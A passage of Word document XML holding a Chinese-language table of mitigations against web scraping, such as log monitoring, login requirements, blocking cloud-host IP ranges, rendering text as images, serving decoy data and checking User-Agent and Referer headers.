      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Scraping</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于深入了解它是如何构建和操作的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B15FED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能用于密码分析，逆向工程或会话分析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548C483D" w14:textId="60E5D72A" w:rsidR="00AE579F" w:rsidRPr="0069302E" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3397"/>
        <w:gridCol w:w="6339"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE579F" w:rsidRPr="00567ECD" w14:paraId="59F5E787" w14:textId="77777777" w:rsidTr="00AE579F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="24BC258D" w14:textId="77777777" w:rsidR="00AE579F" w:rsidRPr="00567ECD" w:rsidRDefault="00AE579F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="60F96072" w14:textId="77777777" w:rsidR="00AE579F" w:rsidRPr="00567ECD" w:rsidRDefault="00AE579F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE579F" w:rsidRPr="00A65911" w14:paraId="2D0D9191" w14:textId="77777777" w:rsidTr="00AE579F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49C01862" w14:textId="6B2CF6E2" w:rsidR="00AE579F" w:rsidRPr="00A65911" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控日志和流量模式，如果发现异常活动，则限制访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6974487B" w14:textId="62B0C203" w:rsidR="00AE579F" w:rsidRPr="00A65911" w:rsidRDefault="00AE579F" w:rsidP="00CC5590">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>定期检查日志，如果有异常活动表明自动访问，例如来自同一</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址的许多类似操作，您可以阻止或限制访问。</w:t>
            </w:r>
            <w:r w:rsidRPr="0069302E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE579F" w:rsidRPr="00A65911" w14:paraId="6C4147C9" w14:textId="77777777" w:rsidTr="00AE579F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C963D51" w14:textId="12B506BC" w:rsidR="00AE579F" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注册和登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ABB3DDE" w14:textId="0AE14316" w:rsidR="00AE579F" w:rsidRPr="0069302E" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>则需要创建帐户才能获取网站信息，不仅对真实用户而且对</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscraper</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有抑制作用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE579F" w:rsidRPr="00A65911" w14:paraId="488B4998" w14:textId="77777777" w:rsidTr="00AE579F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F6BD791" w14:textId="6184B435" w:rsidR="00AE579F" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>阻止来自云托管和抓取服务</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址的访问</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07399EBC" w14:textId="20627032" w:rsidR="00AE579F" w:rsidRPr="0069302E" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有时，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscraper</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将从</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>托管服务运行，例如</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Amazon Web Services</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Google app Engine</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>VPS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制访问您的网站，以获取源自此类云托管服务所使用的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址的请求。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>您还可以阻止从抓取服务使用的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址访问。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE579F" w:rsidRPr="00A65911" w14:paraId="7D7AC306" w14:textId="77777777" w:rsidTr="00AE579F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E37A351" w14:textId="58B3A501" w:rsidR="00AE579F" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>注释您的错误信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07811121" w14:textId="48115B92" w:rsidR="00AE579F" w:rsidRPr="0069302E" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果您阻止访问，则应确保不告诉</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>导致阻塞的原因，从而为他们提供有关如何处理爬取线索</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE579F" w:rsidRPr="00A65911" w14:paraId="0AB7AB18" w14:textId="77777777" w:rsidTr="00AE579F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="093AF8DB" w14:textId="603B17F3" w:rsidR="00AE579F" w:rsidRDefault="00AE579F" w:rsidP="006F61C0">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将文本内容作为图像</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36698FA0" w14:textId="1350B5DA" w:rsidR="00AE579F" w:rsidRDefault="00AE579F" w:rsidP="006F61C0">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>您可以将文本渲染到图像服务器端，并提供要显示的文本，这将阻碍简</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>单的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提取文本。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE579F" w:rsidRPr="00A65911" w14:paraId="7437550F" w14:textId="77777777" w:rsidTr="00AE579F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="696340D7" w14:textId="3953D860" w:rsidR="00AE579F" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>阻止</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>解析器和</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scraper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FBB6C52" w14:textId="1AD36667" w:rsidR="00AE579F" w:rsidRDefault="00AE579F" w:rsidP="00AE579F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>由于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>解析器通过基于</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的可识别模式从页面中提取内容来工作，因此我们可以有意识地更改这些模式以打破</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，甚至可以使用它们。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>大多数这些技巧也适用于其他</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，如爬虫和屏幕捕获。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE579F" w:rsidRPr="00573B9E" w14:paraId="7DE55279" w14:textId="77777777" w:rsidTr="00573B9E">
        <w:trPr>
          <w:trHeight w:val="416"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65E58AFE" w14:textId="093DC74A" w:rsidR="00AE579F" w:rsidRPr="00573B9E" w:rsidRDefault="00AE579F" w:rsidP="00573B9E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>根据用户位置更改</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32122A16" w14:textId="3A03EA04" w:rsidR="00AE579F" w:rsidRPr="00573B9E" w:rsidRDefault="00573B9E" w:rsidP="00573B9E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果您根据用户的位置</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>国家</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地区（由</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地址确定）提供不同的</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，则可能会破坏传送给用户的</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>例如，如果某人正在编写一个从您的网站上删除数据的移动应用程序，它最初会正常工作，但会在实际分发给用户时中断，因为这些用户可能位于不同的国家</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>地区，从而获得不同的</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>HTML</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>嵌入式</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不是为消耗而设计的。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE579F" w:rsidRPr="00573B9E" w14:paraId="660D83D1" w14:textId="77777777" w:rsidTr="00AE579F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="438B0BBA" w14:textId="27918F97" w:rsidR="00AE579F" w:rsidRPr="00573B9E" w:rsidRDefault="00AE579F" w:rsidP="00573B9E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提供虚假信息给</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscrapers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="484DA707" w14:textId="7E376B85" w:rsidR="00AE579F" w:rsidRPr="00573B9E" w:rsidRDefault="00AE579F" w:rsidP="00573B9E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果您发现什么是明显的</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，您可以提供虚假和无用的数据</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>这将破坏</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从您的网站获取的数据。</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>您还应该将这些虚假数据与实际数据区分开来，这样</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>scrapers</w:t>
            </w:r>
            <w:r w:rsidRPr="00573B9E">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>就不会知道他们被搞砸了。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00573B9E" w:rsidRPr="00573B9E" w14:paraId="093BB4DB" w14:textId="77777777" w:rsidTr="00AE579F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06642160" w14:textId="2D9C2325" w:rsidR="00573B9E" w:rsidRPr="00573B9E" w:rsidRDefault="00573B9E" w:rsidP="00573B9E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>勿接受用户代理为空的请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A6113A6" w14:textId="4EF52513" w:rsidR="00573B9E" w:rsidRPr="00573B9E" w:rsidRDefault="00573B9E" w:rsidP="00573B9E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通常，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>webscrapers</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>不会发送带有请求的用户代理标头，而所有浏览器以及搜索引擎爬虫都会。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00573B9E" w:rsidRPr="00573B9E" w14:paraId="011C0CA8" w14:textId="77777777" w:rsidTr="00AE579F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3397" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B21AEA7" w14:textId="2D4B22B8" w:rsidR="00573B9E" w:rsidRPr="00573B9E" w:rsidRDefault="00573B9E" w:rsidP="00573B9E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>referer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="263602F4" w14:textId="637F6E17" w:rsidR="00573B9E" w:rsidRPr="00573B9E" w:rsidRDefault="00573B9E" w:rsidP="00573B9E">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果用户从现场搜索结果页面进入文章页面，请检查</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Referer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>标题是否存在并指向该搜索结果页面。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
